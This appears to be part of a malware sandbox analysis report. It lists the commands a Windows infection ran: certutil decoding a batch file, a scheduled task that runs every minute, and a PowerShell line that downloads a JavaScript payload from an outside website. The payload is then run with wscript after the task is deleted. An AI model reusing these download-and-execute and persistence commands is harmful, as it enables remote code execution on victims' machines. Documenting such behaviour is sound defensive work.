Technical Information
- <SYSTEM32>\tasks\xwvgebhnlg
- '<SYSTEM32>\certutil.exe' -f -decode 4W6EeuBg.bat 4W6EeuBg.bat
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 1 /tn XwvGEbHNLg /tr "%TEMP%\4W6EeuBg.bat"
- %TEMP%\4w6eeubg.bat
- <SYSTEM32>\tasks\xwvgebhnlg
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4W6EeuBg.bat"' (with hidden window)
- '<SYSTEM32>\taskeng.exe' {6271D383-1A42-4AF2-BED4-9D2462288E09} S-1-5-21-3150914307-1777937420-491476919-1000:jqktlep\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4W6EeuBg.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "IWR -UseBasicParsing 'https://entertainment-in-tenerife.com/wp-content/uploads/reader.php' -OutFile '%TEMP%\qCUg91dr.js'; schtasks /delete /f /tn XwvGEbHNLg; wscript %TEMP%\qCUg91dr.j...
- '<SYSTEM32>\schtasks.exe' /delete /f /tn XwvGEbHNLg
- '<SYSTEM32>\wscript.exe' %TEMP%\qCUg91dr.js